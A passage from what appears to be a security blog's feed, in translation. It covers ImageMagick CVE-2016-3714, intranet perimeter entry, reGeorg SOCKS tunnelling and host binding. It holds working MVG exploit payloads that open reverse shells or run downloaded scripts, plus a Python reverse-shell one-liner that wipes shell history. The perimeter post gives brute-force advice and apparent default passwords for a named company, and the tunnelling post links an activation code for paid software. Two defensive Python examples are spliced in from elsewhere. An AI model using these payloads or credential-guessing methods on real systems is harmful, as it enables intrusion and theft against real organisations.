class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> ($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>]> <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Error: "</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] . <span class="string">""</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line"> $dest_file = <span class="string">"./images/"</span>.md5(uniqid(rand())).<span class="string">".png"</span>;</span><br><span class="line"> $thumb = <span class="keyword">new</span> Imagick();</span><br><span class="line"> $thumb->readImage($temp_file);</span><br><span class="line"> $thumb->writeImage($dest_file);</span><br><span class="line"> $thumb->clear();</span><br><span class="line"> $thumb->destroy();</span><br><span class="line"> unlink($temp_file);</span><br><span class="line"> <span class="keyword">echo</span> $dest_file;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p><strong>1. netcat</strong><br>Assuming netcat is installed on the server, the poc is<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|nc xxx.xxx.xxx.xxx 2015 -e /bin/bash")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>Listen on the receiving host<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l -vv -p 2015</span><br></pre></td></tr></table></figure></p>
<p>On the test page, after clicking upload<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2tD8LoFXXXXbNXFXXXXXXXXXX_!!792076116.png" alt=""><br><strong>2. telnet</strong><br>telnet is generally installed by default on the major linux distributions; the poc is<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|telnet x.x.x.x 2015")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>Listen on the receiving host with the same command as above<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2UKp5oFXXXXbIXpXXXXXXXXXX_!!792076116.png" alt=""><br><strong>3. curl&python</strong><br>Use curl to download a python file, then run the python script to connect back<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://1"||curl -sS http://x.x.x.x/test.py | python")'</span><br><span class="line">pop graphic-contex</span><br></pre></td></tr></table></figure></p>
<p>This needs an external server hosting your script; the python script is<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,socket,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<span class="string">"x.x.x.x"</span>,<span class="number">2015</span>));os.dup2(s.fileno(),<span class="number">0</span>);os.dup2(s.fileno(),<span class="number">1</span>);os.dup2(s.fileno(),<span class="number">2</span>);os.unsetenv(<span class="string">"HISTFILE"</span>);os.unsetenv(<span class="string">"HISTFILESIZE"</span>);os.unsetenv(<span class="string">"HISTSIZE"</span>);os.unsetenv(<span class="string">"HISTORY"</span>);os.unsetenv(<span class="string">"HISTSAVE"</span>);os.unsetenv(<span class="string">"HISTZONE"</span>);os.unsetenv(<span class="string">"HISTLOG"</span>);os.unsetenv(<span class="string">"HISTCMD"</span>);os.putenv(<span class="string">"HISTFILE"</span>,<span class="string">"/dev/null"</span>);os.putenv(<span class="string">"HISTSIZE"</span>,<span class="string">"0"</span>);os.putenv(<span class="string">"HISTFILESIZE"</span>,<span class="string">"0"</span>);pty.spawn(<span class="string">"/bin/sh"</span>);s.close()</span><br></pre></td></tr></table></figure></p>
<p>Remember to change the callback ip and port in the script; the test succeeds<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2v4GmoFXXXXb7XXXXXXXXXXXX_!!792076116.png" alt=""><br><strong>4. wget</strong><br>Write a php script on the remote server that logs the visiting ip,<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$ip = $_SERVER[<span class="string">'REMOTE_ADDR'</span>];</span><br><span class="line">file_put_contents(<span class="string">"log.txt"</span>, <span class="string">"ping from "</span>.$ip, FILE_APPEND);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>The poc is<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">push graphic-context</span><br><span class="line">viewbox 0 0 640 480</span><br><span class="line">fill 'url(https://example.com/image.jpg"|wget http://x.x.x.x/img.php")'</span><br><span class="line">pop graphic-context</span><br></pre></td></tr></table></figure></p>
<p>If the command executes, the visiting ip is recorded in log.txt<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2qROpoFXXXXblXpXXXXXXXXXX_!!792076116.png" alt=""></p>
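<p>The upload handler above hands whatever was uploaded straight to Imagick, so ImageMagick decides the format from the file content and an MVG text file renamed to .png is parsed as MVG. The following is an added Python example, not part of the original post and not ImageMagick's or the imagick extension's code: a content gate that identifies uploads by magic bytes and refuses text-based coder input before anything reaches the converter. The samples are constructed, and the gate complements (does not replace) the coder restrictions in policy.xml.</p>

```python
# Constructed samples (not real uploads): the leading bytes of the three
# raster formats a thumbnail endpoint usually needs, plus a harmless MVG
# document in the text syntax the PoCs above use (without any fill url(...)
# line) and an SVG; ImageMagick would parse both of the latter as vector input.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
GIF_SAMPLE = b"GIF89a" + b"\x00" * 16
MVG_SAMPLE = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"
SVG_SAMPLE = b'<?xml version="1.0"?>\n<svg xmlns="http://www.w3.org/2000/svg"/>\n'

# Markers of text-based coders (MVG, SVG, PostScript) near the start of a file
TEXT_CODER_MARKERS = (b"push graphic-context", b"viewbox", b"<svg",
                      b"<?xml", b"%!ps", b"url(")


def sniff_raster_format(data):
    """Identify the upload by its magic bytes only. The file extension and the
    Content-Type sent by the client are attacker-controlled (and the handler
    above renames every upload to .png anyway), so neither is consulted."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return None


def has_text_coder_markers(data, window=512):
    """Conservative secondary check: refuse vector/text syntax in the leading
    bytes even when a raster magic matched. It may reject odd but legitimate
    files; for a thumbnail endpoint that is the right trade-off."""
    head = data[:window].lower()
    return any(marker in head for marker in TEXT_CODER_MARKERS)


def accept_upload(data, allowed=("png", "jpeg", "gif")):
    """Return (accepted, detail). Only a recognised, allowed raster format with
    no text-coder syntax in its header is handed to ImageMagick. This is a
    gate in front of the converter, not a replacement for disabling the
    MVG/MSL/EPHEMERAL/URL/HTTPS coders in ImageMagick's policy.xml."""
    fmt = sniff_raster_format(data)
    if fmt is None:
        return False, "unrecognised or non-raster content"
    if fmt not in allowed:
        return False, "format not allowed: " + fmt
    if has_text_coder_markers(data):
        return False, "text-coder markers inside a " + fmt + " header"
    return True, fmt


if __name__ == "__main__":
    for name, sample in (("png", PNG_SAMPLE), ("jpeg", JPEG_SAMPLE),
                         ("gif", GIF_SAMPLE), ("mvg", MVG_SAMPLE),
                         ("svg", SVG_SAMPLE)):
        print(name, accept_upload(sample))
```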
]]></content>
<summary type="html">
<p>&emsp;&emsp;On 3 May a severe 0day (CVE-2016-3714) was disclosed in the image processing software ImageMagick; through it an attacker can execute arbitrary commands, ultimately stealing sensitive information and taking control of the server.
</summary>
<category term="漏洞分析" scheme="http://wps2015.org/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<category term="poc" scheme="http://wps2015.org/tags/poc/"/>
</entry>
<entry>
<title>A brief discussion of the enterprise network perimeter</title>
<link href="http://wps2015.org/2016/03/07/a-simple-discuss-of-enterprise-local-network/"/>
<id>http://wps2015.org/2016/03/07/a-simple-discuss-of-enterprise-local-network/</id>
<published>2016-03-06T16:00:00.000Z</published>
<updated>2016-11-08T01:44:46.748Z</updated>
<content type="html"><![CDATA[<h2 id="0x01-企业网络边界"><a href="#0x01-企业网络边界" class="headerlink" title="0x01 The enterprise network perimeter"></a>0x01 The enterprise network perimeter</h2><p>  To get from the outside into the intranet, one thing must necessarily happen: the perimeter has to be crossed. So the weak spot should naturally be looked for on the boundary between the enterprise's internal and external networks.<a id="more"></a><br>  Why does an enterprise need such a boundary between inside and outside at all? Consider a large enterprise with hundreds or even thousands of business lines while the security team has perhaps a few dozen people. For those few dozen to secure thousands of business lines, covering every point individually is clearly impossible, so when the enterprise thinks about defence it chooses zone-based defence.<br>  Zone-based defence means putting the business systems and data that most need protection into a designated zone, isolating that zone, defining the firewall policy for entering it, and then checking the zone's security periodically.<br>  If this is implemented well, everything looks perfect. In reality it falls short. Inside an enterprise the business departments are usually stronger than the security department, as everyone knows, and that causes a problem: the security department always wants to fence the business in with strict policies and standards, while the business departments, iterating quickly, find it hard to follow them strictly. They demand policies tailored to their particular scenarios, even deployment outside the isolated zone, and such cases are far from rare. The policies and standards the security department has to maintain keep growing, and that directly makes enforcement worse and worse.</p>
<h2 id="0x02-合法的入口"><a href="#0x02-合法的入口" class="headerlink" title="0x02 Legitimate entrances"></a>0x02 Legitimate entrances</h2><h3 id="1-物理接触"><a href="#1-物理接触" class="headerlink" title="1. Physical access"></a>1. Physical access</h3><p>  If you can physically reach the company intranet (plug in a network cable or join the wifi), all I can say is hats off. Cases:</p>
<ul>
<li><a href="http://www.wooyun.org/bugs/wooyun-2015-0108465" target="_blank" rel="external">How I used WiFi Master Key to physically walk through JD's intranet</a></li>
<li><a href="http://www.wooyun.org/bugs/wooyun-2010-0149911" target="_blank" rel="external">Offline testing that eventually reached Xiaomi's key systems</a></li>
</ul>
<p>  Both cases obtained the wifi password through WiFi Master Key (once the phone is rooted, the passwords of previously joined networks can be read) and connected straight into the intranet. Intranet systems are generally not very secure: weak passwords, xss, injection; sniffing, phishing and traffic hijacking are possible too.</p>
<h3 id="2-非物理接触"><a href="#2-非物理接触" class="headerlink" title="2. Non-physical access"></a>2. Non-physical access</h3><p>  Large companies generally run many management systems; if every system gave each employee its own account, there would be far too many credentials to remember. So large companies usually have one master account, typically the OA system, the vpn or a single sign-on portal; the employee logs in with it and is authorized to the other systems. This relieves employees and is relatively safer as well (too many passwords inevitably means weak ones). But everything has two sides: if one employee's account leaks or has a weak password, every system it is authorized for becomes accessible to the attacker.</p>
<h4 id="2-1-获取用户名密码的方式"><a href="#2-1-获取用户名密码的方式" class="headerlink" title="2.1 Ways of obtaining usernames and passwords"></a>2.1 Ways of obtaining usernames and passwords</h4><ul>
<li>Username and password brute force</li>
</ul>
<p>   The most common method is of course brute force. If the single sign-on portal cannot be brute-forced, the mailbox is the next candidate; if the login has a captcha that is not complex, pkav's brute-force tool that recognises simple captchas is recommended; if there is an ip restriction, check whether it is actually enforced via a cookie, and if it is not and you do not have many proxies, give up. For usernames, it is best to collect names or usernames of the company's staff; failing that, use the built-in top500 names. For passwords, generally the top100.</p>
<p>References:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2015-0133393" target="_blank" rel="external">COFCO: an improperly designed component leads into the intranet (multiple systems / large information leak)</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-0165182" target="_blank" rel="external">Tuniu intranet roaming (many database privileges / large amounts of user data / Tmall store, points mall and main-site backend access)</a></p>
</blockquote>
<ul>
<li>Social engineering (github, social engineering databases)</li>
</ul>
<p>   They say this is the era of big data, and social engineering is always effective. Developers accidentally push code to github that happens to contain email addresses, passwords and the like, which attackers find easily. Common search terms, using ele.me as the example<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smtp ele.me</span><br><span class="line">ele.me pass</span><br><span class="line">mail @ele.me</span><br><span class="line">.......</span><br></pre></td></tr></table></figure></p>
<p>   With big data, one can search a social engineering database directly for a company's corporate email domain, such as @ele.me. Some people have fairly complex passwords but have reused the same one for years, which is just as dangerous.<br>References:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0147179" target="_blank" rel="external">Meituan: an internal mailbox account leaked and could be used to log in (vpn connected)</a></p>
</blockquote>
<ul>
<li>Password reset</li>
</ul>
<p>   Think about it: if an employee wants to change their vpn password, what is a good way to do it? Unless they have to walk to the ops office and show ID, there must be something both sides trust, usually the mailbox plus personal details. If I email ops saying I forgot my vpn password and supply some personal details, will ops change it for me?<br>References:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2015-0150946" target="_blank" rel="external">China Resources Double-Crane: from a mailbox to roaming the group intranet</a><br><a href="http://www.wooyun.org/bugs/wooyun-2015-0150613" target="_blank" rel="external">Taking over the Meizu online store to get past vpn two-factor authentication and into the intranet (large numbers of detailed user orders / phone IMEIs, etc.)</a></p>
</blockquote>
<h4 id="2-2-谈谈用户名和密码"><a href="#2-2-谈谈用户名和密码" class="headerlink" title="2.2 On usernames and passwords"></a>2.2 On usernames and passwords</h4><ul>
<li>Usernames</li>
</ul>
<p>   For ease of management and of memory, employee usernames are usually the employee's name in pinyin, most commonly like this:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">zhangwei</span><br><span class="line">wangwei</span><br><span class="line">wangfang</span><br></pre></td></tr></table></figure></p>
<p>   Or like this<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wei.zhang</span><br><span class="line">wei.wang</span><br><span class="line">fang.wang</span><br></pre></td></tr></table></figure></p>
<p>   Forward, reversed and abbreviated forms combine into as many as 6 variants<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">zhangwei</span><br><span class="line">zw</span><br><span class="line">zhang.wei</span><br><span class="line">wei.zhang</span><br><span class="line">zhangw</span><br><span class="line">w.zhang</span><br></pre></td></tr></table></figure></p>
<p>   So do not simply throw the top500 name dictionary at every login form you see; knowing a company's username convention beforehand makes brute forcing both more accurate and more efficient. And as the population grows (too many essays written), the chance of duplicate names, or similar names with the same pinyin, in a large company is considerable, e.g. <code>李伟,李威,李维,李卫</code> (all "Li Wei"). To tell them apart, there is the following:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">liwei01</span><br><span class="line">liwei02</span><br><span class="line">liwei03</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>
<p>Of course the most accurate approach is to first take over a mailbox or OA account and export the address book from it!!!<br>References:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0134278" target="_blank" rel="external">Penetration test of multiple COFCO systems (multiple systems entered)</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-0133495" target="_blank" rel="external">The dictionary way: into Baidu Nuomi's operations support platform / key-account advertising system / possibly further into the intranet</a></p>
</blockquote>
<ul>
<li>Passwords</li>
</ul>
<p>  Passwords have always been the hard part. I divide them into two kinds: general-purpose ones, such as the weak-password top 10 or top 100 (I am sure every expert has a private dictionary they do not hand out lightly); and dictionaries generated for a specific username, company or system.<br>  I will skip the general top 100, but there is one class of password that ordinary people rarely use and programmers love, known as the <strong>keyboard walk</strong>:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">q2w3e4r5t</span><br><span class="line">1qaz@WSX</span><br><span class="line">123456asd</span><br><span class="line">1q2w3e</span><br><span class="line">1qaz@WSX</span><br><span class="line">ZAQ!xsw2</span><br><span class="line">ZAQ!2wsx</span><br><span class="line">2wsx#EDC</span><br><span class="line">@WSX3edc</span><br></pre></td></tr></table></figure></p>
<p>  These are worth adding to your own dictionary; they often work wonders.<br>  If you already have reliable usernames, it is worth building dictionaries tailored to them, for example<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">liwei</span><br><span class="line">liwei1989</span><br><span class="line">liwei@1989</span><br><span class="line">1iwei@scu</span><br><span class="line">liweiscu</span><br></pre></td></tr></table></figure></p>
<p>  When a company assigns passwords to employees there is usually a default password that the employee is expected to change. If some employees never change it, it can be exploited. Default passwords differ between companies; Ele.me's common defaults, for example, are closely tied to the company's domain name.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ele.me</span><br><span class="line">ele@123</span><br><span class="line">ele.me@123</span><br><span class="line">ele.me5121314</span><br><span class="line">ele@123456789</span><br><span class="line">eleme@3456789</span><br><span class="line">Hello_eleme123</span><br></pre></td></tr></table></figure></p>
<h2 id="0x03-不合法的入口"><a href="#0x03-不合法的入口" class="headerlink" title="0x03 不合法的入口"></a>0x03 Illegitimate entry points</h2><blockquote>
<p>Illegitimate entry points generally means using a vulnerability to gain control of a machine on the intranet, or using a vulnerability to bypass the perimeter; I will not say much about this.</p>
</blockquote>
<ul>
<li>Using any of a range of vulnerabilities to take over a server on the perimeter<br>This is the most common route; the vulnerabilities include web vulnerabilities, host vulnerabilities and others. As noted earlier, the security operations staff of a large company have to maintain thousands of services, and many peripheral ones certainly cannot be fully protected. Such services may go unmaintained for long periods, yet they sit on the perimeter and can talk to the intranet. As the saying goes, "a dike of a thousand li collapses from an ant hole": a company's interior is often fragile, and once an attacker gets inside the perimeter the company is meat on the chopping board.<br>Case:<br><a href="http://www.wooyun.org/bugs/wooyun-2015-0129012" target="_blank" rel="external">A vulnerability in a Dongfeng Motor system leads to intranet roaming (control of many servers/databases/FTP, large leak of sensitive data)</a></li>
<li>Host binding: direct access to intranet services<br>In short, the server has two network cards (public and intranet) and the web server does not check where a visitor comes from; a visitor who binds the intranet domain name to the public IP in their hosts file can reach the intranet service directly.<br>Case and explanation:<br><a href="http://wps2015.jinglingshu.org/?p=172" target="_blank" rel="external">Insecure aspects of server host binding</a></li>
<li>Probing the intranet via SSRF<br>SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker crafts a request that the server then issues on their behalf. Typically the target of an SSRF attack is an internal system that cannot be reached from the Internet (precisely because the request originates from the server, it can reach internal systems that are connected to the server but isolated from the outside). Most SSRF bugs reveal only limited intranet information, but they can support other vulnerabilities during a penetration test.<br>Cases:<br><a href="http://www.wooyun.org/bugs/wooyun-2015-0162607" target="_blank" rel="external">An SSRF on Zhihu's main site can probe the intranet</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-099070" target="_blank" rel="external">Baidu: from SSRF to an intranet WebShell</a><br>Discovery tips:<br><a href="http://bobao.360.cn/learning/detail/240.html" target="_blank" rel="external">Experience in finding SSRF vulnerabilities</a></li>
</ul>
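<p>The SSRF item above describes requests that the server issues toward addresses the outside cannot reach. As an added example (not code from the original post), here is the destination check a defender would put in front of such a server-side fetch, in Python 3: the URL scheme is restricted, and a literal IP or every address a hostname resolves to is rejected when it falls in a private, loopback, link-local or other non-public range. The resolver is injected so the check runs offline; the name-to-address table below is constructed for the example, and <code>is_safe_fetch_target</code> and <code>is_public_address</code> are names chosen here.</p>

```python
"""Destination check for a server-side fetch (added example, Python 3)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name -> address table standing in for DNS so the check runs offline.
FAKE_DNS = {
    "www.example.com": ["93.184.216.34"],
    "intranet.corp.example": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],  # public and private answer
}


def is_public_address(ip_text):
    """True only for addresses outside the private, loopback, link-local,
    multicast, reserved and unspecified ranges (IPv4 and IPv6)."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_fetch_target(url, resolve=lambda host: FAKE_DNS.get(host, [])):
    """Decide whether the server may fetch `url` on a user's behalf.

    `resolve(host)` returns the list of IP strings the name maps to; every
    one of them must be public, because an attacker-controlled name can
    answer with both a public and a private address (the rebind case).
    In production, connect to the address you validated instead of
    resolving the name a second time."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP in the URL
    except ValueError:
        addrs = resolve(host)                        # hostname: check all answers
    if not addrs:
        return False
    return all(is_public_address(a) for a in addrs)


if __name__ == "__main__":
    for u in ("http://www.example.com/page", "http://10.0.0.1/", "http://rebind.example/"):
        print(u, "->", "allowed" if is_safe_fetch_target(u) else "blocked")
```

The check is only as good as the resolution step: a name that resolves to a public address at check time and a private one at connect time defeats it, which is why the connection should be made to the validated address.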
<h2 id="0x04-小结"><a href="#0x04-小结" class="headerlink" title="0x04 小结"></a>0x04 Summary</h2><p>  As the film "Who Am I – No System Is Safe" puts it, there is no truly secure system, and so there is no truly secure intranet defense either. For a large Internet company the problem is not that their security work is poor: the defender has to cover a whole surface, while the attacker needs only one point, and digging deep into one point will always turn up a way in. A company's security program is in fact continually raising the bar for attackers, not making itself invulnerable.</p>
<hr>
<p>Reference:<br><a href="http://drops.wooyun.org/tips/7831" target="_blank" rel="external">http://drops.wooyun.org/tips/7831</a></p>
]]></content>
<summary type="html">
<h2 id="0x01-企业网络边界"><a href="#0x01-企业网络边界" class="headerlink" title="0x01 企业网络边界"></a>0x01 The enterprise network perimeter</h2><p>&emsp;&emsp;We know that to get from the outside into the intranet, one thing that must be done is to cross the perimeter, so this weak spot is naturally to be found on the boundary between the company's internal and external networks.
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="内网" scheme="http://wps2015.org/tags/%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>Intranet penetration with a SOCKS5 proxy (detailed reGeorg + proxifier configuration)</title>
<link href="http://wps2015.org/2016/03/02/Network-infiltration-socks5-agency/"/>
<id>http://wps2015.org/2016/03/02/Network-infiltration-socks5-agency/</id>
<published>2016-03-02T08:48:10.000Z</published>
<updated>2016-12-05T06:56:29.673Z</updated>
<content type="html"><![CDATA[<h3 id="1-首先我们需要明白正向代理和反向代理的区别"><a href="#1-首先我们需要明白正向代理和反向代理的区别" class="headerlink" title="1. 首先我们需要明白正向代理和反向代理的区别"></a>1. First we need to understand the difference between forward and reverse proxies</h3><p><strong>1.1 Forward proxy</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost-->proxy-->Rhost</span><br></pre></td></tr></table></figure>
<p>  To reach Rhost, Lhost sends a request to proxy and names Rhost as the target; proxy then forwards the request to Rhost and returns the content it obtains to Lhost. In short, with a forward proxy the proxy visits Rhost in our place.<a id="more"></a></p>
<p><strong>1.2 Reverse proxy</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost<-->proxy<-->firewall<-->Rhost</span><br></pre></td></tr></table></figure>
<p>  The opposite of a forward proxy (obviously): Lhost only sends an ordinary request to proxy, proxy itself decides where to forward it, and then hands the returned data back. The benefit is that where a firewall only lets proxy traffic in and out, this can tunnel through effectively.</p>
<p>  The tools we normally use, reDuh and tunna, are forward proxies just like reGeorg. Typically the user uploads a proxy script to the server, a local program connects to that script, and the script forwards ports and traffic.</p>
<h3 id="2-工具介绍"><a href="#2-工具介绍" class="headerlink" title="2. 工具介绍"></a>2. Tools</h3><p><strong>2.1 reGeorg</strong><br>  reGeorg is the successor to reDuh; it uses the session-layer SOCKS5 protocol and is more efficient.</p>
<p>  reGeorg download: <a href="https://github.com/sensepost/reGeorg" target="_blank" rel="external">download</a></p>
<p><strong>2.2 proxifier</strong></p>
<p>  Proxifier is a very powerful SOCKS5 client that lets network programs which do not support working through a proxy server use HTTPS or SOCKS proxies or proxy chains.</p>
<p>  Download: <a href="https://www.proxifier.com/" target="_blank" rel="external">download</a></p>
<p>  Activation code: <a href="http://wenku.baidu.com/link?url=T9od33JuA7jjxzfyV-wOjsYyARbVXwuXs2GwWwXLkX6vxRU4Rj0p_e2_0l1A0-WT9NOs3sh1OqDbYBgFYXLyjfconba4FF4iqdoz-tV5GH_" target="_blank" rel="external">view</a></p>
<h3 id="3-工具配置"><a href="#3-工具配置" class="headerlink" title="3. 工具配置"></a>3. Tool configuration</h3><h4 id="reGeorg设置"><a href="#reGeorg设置" class="headerlink" title="reGeorg设置"></a>reGeorg setup</h4><p>First upload the matching reGeorg script to the server. If visiting it directly shows "Georg says, 'All seems fine'", the script is running correctly</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2jKQ4mVXXXXbfXpXXXXXXXXXX_!!792076116.png" alt="clipboard"></p>
<p>Run the Python program: <code>python reGeorgSocksProxy.py -p 8888 -u http://www.example.com/test/tunnel.jsp</code></p>
<h4 id="proxifier配置"><a href="#proxifier配置" class="headerlink" title="proxifier配置"></a>proxifier configuration</h4><p>Open proxifier and configure the Proxy Server like this</p>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2nSXwnXXXXXXdXXXXXXXXXXXX_!!792076116.png" alt="clipboard (2)"><br>Open Proxification Rules and pay attention to the rule settings; the default is Direct<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2JIKRXEdnpuFjSZPhXXbChpXa_!!792076116.png" alt=""><br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2vkyPXstnpuFjSZFKXXalFFXa_!!792076116.png" alt=""><br>Then right-click the Remote Desktop program and open it through Proxifier, choosing "Proxy SOCKS5 127.0.0.1". Use ipconfig to look up the intranet machine's IP<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2Xfw2mVXXXXbJXpXXXXXXXXXX_!!792076116.png" alt="clipboard (3)"><br>Enter the intranet machine's internal IP directly in the Remote Desktop connection<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2hdljnXXXXXclXXXXXXXXXXXX_!!792076116.png" alt="clipboard (4)"><br>Click Connect and you are in.</p>
]]></content>
<summary type="html">
<h3 id="1-首先我们需要明白正向代理和反向代理的区别"><a href="#1-首先我们需要明白正向代理和反向代理的区别" class="headerlink" title="1. 首先我们需要明白正向代理和反向代理的区别"></a>1. First we need to understand the difference between forward and reverse proxies</h3><p><strong>1.1 Forward proxy</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost--&gt;proxy--&gt;Rhost</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;To reach Rhost, Lhost sends a request to proxy and names Rhost as the target; proxy then forwards the request to Rhost and returns the content it obtains to Lhost. In short, with a forward proxy the proxy visits Rhost in our place.
</summary>
<category term="神器而已" scheme="http://wps2015.org/categories/%E7%A5%9E%E5%99%A8%E8%80%8C%E5%B7%B2/"/>
<category term="内网" scheme="http://wps2015.org/tags/%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>Insecure aspects of server host binding</title>
<link href="http://wps2015.org/2015/09/29/the-unsafe-factors-of-host-binding/"/>
<id>http://wps2015.org/2015/09/29/the-unsafe-factors-of-host-binding/</id>
<published>2015-09-29T08:24:59.000Z</published>
<updated>2016-11-08T01:46:57.610Z</updated>
<content type="html"><![CDATA[<p><strong>1、The Host header</strong><br>Host-header binding is a common way for sites to run several sites on one machine. It is considerably safer than using different ports for the same purpose, because ports can be found by brute force, whereas host binding is much harder to crack since it requires knowing the mapping between IP and host name.<a id="more"></a></p>
<p><strong>2、Cause and impact</strong><br>For ease of management and to save on server costs, many sites place the intranet management site and the public site on the same server and rely on virtual hosting to keep them apart.</p>
<p>Often the server has two network cards, one on the public Internet and one on the intranet, so the public can reach the public site while the intranet reaches the management site, with a host binding for each.</p>
